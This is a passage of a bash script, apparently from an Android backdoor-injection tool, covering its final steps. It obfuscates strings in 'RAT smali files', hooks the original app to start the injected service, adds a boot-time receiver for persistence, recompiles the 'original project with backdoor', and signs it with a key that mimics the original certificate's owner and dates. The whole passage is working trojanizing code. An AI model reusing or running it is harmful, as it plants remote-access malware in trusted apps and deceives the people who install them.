  597.       sed -i -e '/'"$placeholder"'/d' $MY_PATH/original/smali/$INJECT_PACKAGE/*.smali >>$LOG_FILE 2>&1
    598. 

  598.     fi
    599. 

  599.   done
    600. 

  600.   cd $MY_PATH
    601. 

  601.   rm -v $TMP_DIR/*.stub >>$LOG_FILE 2>&1
    602. 

  602.   rm -v $TMP_DIR/placeholders.txt >>$LOG_FILE 2>&1
    603. 

  603.   if [ ! -f $MY_PATH/obfuscate.error ]; then
    604. 

  604.     class="$stringobfuscator_class"
    605. 

  605.     sed -i 's|###CLASS###|'"$class"'|' $MY_PATH/original/smali/$INJECT_PACKAGE/*.smali
    606. 

  606.     rc=$?
    607. 

  607.     if [ $rc == 0 ]; then
    608. 

  608.       method="$new_so_unobfuscate_method_name"
    609. 

  609.       sed -i 's|###METHOD###|'"$method"'|' $MY_PATH/original/smali/$INJECT_PACKAGE/*.smali
    610. 

  610.       rc=$?
    611. 

  611.     fi
    612. 

  612.   else
    613. 

  613.     rm -v $MY_PATH/obfuscate.error >>$LOG_FILE 2>&1
    614. 

  614.     rc=1
    615. 

  615.   fi
    616. 

  616. fi
    617. 

  617. echo "done."
    618. 

  618. if [ $rc != 0 ]; then
    619. 

  619.   echo "[!] Failed to obfuscate const-string values in RAT smali files"
    620. 

  620.   cleanup
    621. 

  621.   exit $rc
    622. 

  622. fi
    623. 

    624. 

  624. echo -n "[*] Adding hook in original smali file..."
    625. 

  625. hook_smali_file $new_ms_name $smali_file_to_hook
    626. 

  626. rc=$?
    627. 

  627. echo "done."
    628. 

  628. if [ $rc != 0 ]; then
    629. 

  629.   echo "[!] Failed to add hook"
    630. 

  630.   cleanup
    631. 

  631.   exit $rc
    632. 

  632. fi
    633. 

    634. 

  634. dotted_inject_package=$(echo "$INJECT_PACKAGE" |sed -r 's:/:.:g')
    635. 

  635. cat >$MY_PATH/persistence.hook <<EOL
    636. 

  636.         <receiver android:name="${dotted_inject_package}.${new_mbr_name}">
    637. 

  637.             <intent-filter>
    638. 

  638.                 <action android:name="android.intent.action.BOOT_COMPLETED"/>
    639. 

  639.             </intent-filter>
    640. 

  640.         </receiver>
    641. 

  641.         <service android:exported="true" android:name="${dotted_inject_package}.${new_ms_name}"/>
    642. 

  642. EOL
    643. 

  643. grep "android.permission.RECEIVE_BOOT_COMPLETED" $original_manifest_file >>$LOG_FILE 2>&1
    644. 

  644. rc=$?
    645. 

  645. if [ $rc == 0 ]; then
    646. 

  646.   echo -n "[*] Adding persistence hook in original project..."
    647. 

  647.   sed -i '0,/<\/application>/s//'"$placeholder"'\n    <\/application>/' $original_manifest_file >>$LOG_FILE 2>&1
    648. 

  648.   rc=$?
    649. 

  649.   if [ $rc == 0 ]; then
    650. 

  650.     sed -i '/'"$placeholder"'/r '"$MY_PATH"'/persistence.hook' $original_manifest_file >>$LOG_FILE 2>&1
    651. 

  651.     rc=$?
    652. 

  652.     if [ $rc == 0 ]; then
    653. 

  653.       sed -i '/'"$placeholder"'/d' $original_manifest_file >>$LOG_FILE 2>&1
    654. 

  654.       rc=$?
    655. 

  655.     fi
    656. 

  656.   fi
    657. 

  657.   echo "done."
    658. 

  658.   if [ $rc != 0 ]; then
    659. 

  659.     echo "[!] Failed to add persistence hook"
    660. 

  660.     cleanup
    661. 

  661.     exit $rc
    662. 

  662.   fi
    663. 

  663. else
    664. 

  664.   echo "[+] Unable to add persistence hook due to missing permission"
    665. 

  665. fi
    666. 

    667. 

  667. echo -n "[*] Recompiling original project with backdoor..."
    668. 

  668. $APKTOOL b $MY_PATH/original >>$LOG_FILE 2>&1
    669. 

  669. rc=$?
    670. 

  670. echo "done."
    671. 

  671. if [ $rc != 0 ]; then
    672. 

  672.   echo "[!] Failed to recompile original project with backdoor"
    673. 

  673.   cleanup
    674. 

  674.   exit $rc
    675. 

  675. fi
    676. 

    677. 

  677. keystore=$MY_PATH/signing.keystore
    678. 

  678. compiled_apk=$MY_PATH/original/dist/$ORIG_APK_FILE_NAME
    679. 

  679. unaligned_apk=$MY_PATH/original/dist/unaligned.apk
    680. 

    681. 

  681. dname=`$KEYTOOL -J-Duser.language=en -printcert -jarfile $ORIG_APK_FILE |grep -m 1 "Owner:" |sed 's/^.*: //g'`
    682. 

  682. echo "Original dname value: $dname" >>$LOG_FILE 2>&1
    683. 

    684. 

  684. valid_from_line=`$KEYTOOL -J-Duser.language=en -printcert -jarfile $ORIG_APK_FILE |grep -m 1 "Valid from:"`
    685. 

  685. echo "Original valid from line: $valid_from_line" >>$LOG_FILE 2>&1
    686. 

  686. from_date=$(sed 's/^Valid from://g' <<< $valid_from_line |sed 's/until:.\+$//g' |sed 's/^[[:space:]]*//g' |sed 's/[[:space:]]*$//g')
    687. 

  687. echo "Original from date: $from_date" >>$LOG_FILE 2>&1
    688. 

  688. from_date_tz=$(awk '{ print $5 }' <<< $from_date)
    689. 

  689. from_date_norm=$(sed 's/[[:space:]]'"$from_date_tz"'//g' <<< $from_date)
    690. 

  690. echo "Normalized from date: $from_date_norm" >>$LOG_FILE 2>&1
    691. 

  691. to_date=$(sed 's/^Valid from:.\+until://g' <<< $valid_from_line |sed 's/^[[:space:]]*//g' |sed 's/[[:space:]]*$//g')
    692. 

  692. echo "Original to date: $to_date" >>$LOG_FILE 2>&1
    693. 

  693. to_date_tz=$(awk '{ print $5 }' <<< $to_date)
    694. 

  694. to_date_norm=$(sed 's/[[:space:]]'"$to_date_tz"'//g' <<< $to_date)
    695. 

  695. echo "Normalized to date: $to_date_norm" >>$LOG_FILE 2>&1
    696. 

  696. from_date_str=`TZ=UTC date --date="$from_date_norm" +"%Y/%m/%d %T"`
    697. 

  697. echo "Value of from_date_str: $from_date_str" >>$LOG_FILE 2>&1
    698. 

  698. end_ts=$(TZ=UTC date -ud "$to_date_norm" +'%s')
    699. 

  699. start_ts=$(TZ=UTC date -ud "$from_date_norm" +'%s')
    700. 

  700. validity=$(( ( (${end_ts} - ${start_ts}) / (60*60*24) ) ))
    701. 

  701. echo "Value of validity: $validity" >>$LOG_FILE 2>&1
    702. 

  702. 

  703. echo -n "[*] Generating RSA key for signing..."
    704. 

  704. $KEYTOOL -genkey -noprompt -alias signing.key -startdate "$from_date_str" -validity $validity -dname "$dname" -keystore $keystore -storepass android -keypass android -keyalg RSA -keysize 2048 >>$LOG_FILE 2>&1
    705. 

  705. rc=$?
    706. 

  706. if [ $rc != 0 ]; then
    707. 

  707.   echo "Retrying RSA key generation without original APK cert from date and validity values" >>$LOG_FILE 2>&1
    708. 

  708.   $KEYTOOL -genkey -noprompt -alias signing.key -validity 10000 -dname "$dname" -keystore $keystore -storepass android -keypass android -keyalg RSA -keysize 2048 >>$LOG_FILE 2>&1
    709. 

  709.   rc=$?
    710. 

  710. fi
    711. 

  711. echo "done."
    712. 

  712. if [ $rc != 0 ]; then
    713. 

  713.   echo "[!] Failed to generate RSA key"
    714. 

  714.   cleanup
    715. 

  715.   exit $rc
    716. 

  716. fi
    717. 

  717. 

  718. echo -n "[*] Signing recompiled APK..."
    719. 

  719. $JARSIGNER -sigalg SHA1withRSA -digestalg SHA1 -keystore $keystore -storepass android -keypass android $compiled_apk signing.key >>$LOG_FILE 2>&1
    720. 

  720. rc=$?
    721. 

  721. echo "done."
    722. 

  722. if [ $rc != 0 ]; then
    723. 

  723.   echo "[!] Failed to sign recompiled APK"
    724. 

  724.   cleanup
    725. 

  725.   exit $rc
    726. 

  726. fi
    727. 

  727. 

  728. echo -n "[*] Verifying signed artifacts..."
    729. 

  729. $JARSIGNER -verify -certs $compiled_apk >>$LOG_FILE 2>&1
    730. 

  730. rc=$?
    731. 

  731. echo "done."
    732. 

  732. if [ $rc != 0 ]; then
    733. 

  733.   echo "[!] Failed to verify signed artifacts"
    734. 

  734.   cleanup
    735. 

  735.   exit $rc
    736. 

  736. fi
    737. 

  737. 

  738. mv $compiled_apk $unaligned_apk
    739. 

  739. 

  740. echo -n "[*] Aligning recompiled APK..."
    741. 

  741. $ZIPALIGN 4 $unaligned_apk $compiled_apk >>$LOG_FILE 2>&1
    742. 

  742. rc=$?
    743. 

  743. echo "done."
    744. 

  744. if [ $rc != 0 ]; then
    745. 

  745.   echo "[!] Failed to align recompiled APK"
    746. 

  746.   cleanup
    747. 

  747.   exit $rc
    748. 

  748. fi
    749. 

  749. 

  750. rm $unaligned_apk
    751. 

  751. 

  752. exit 0
    753.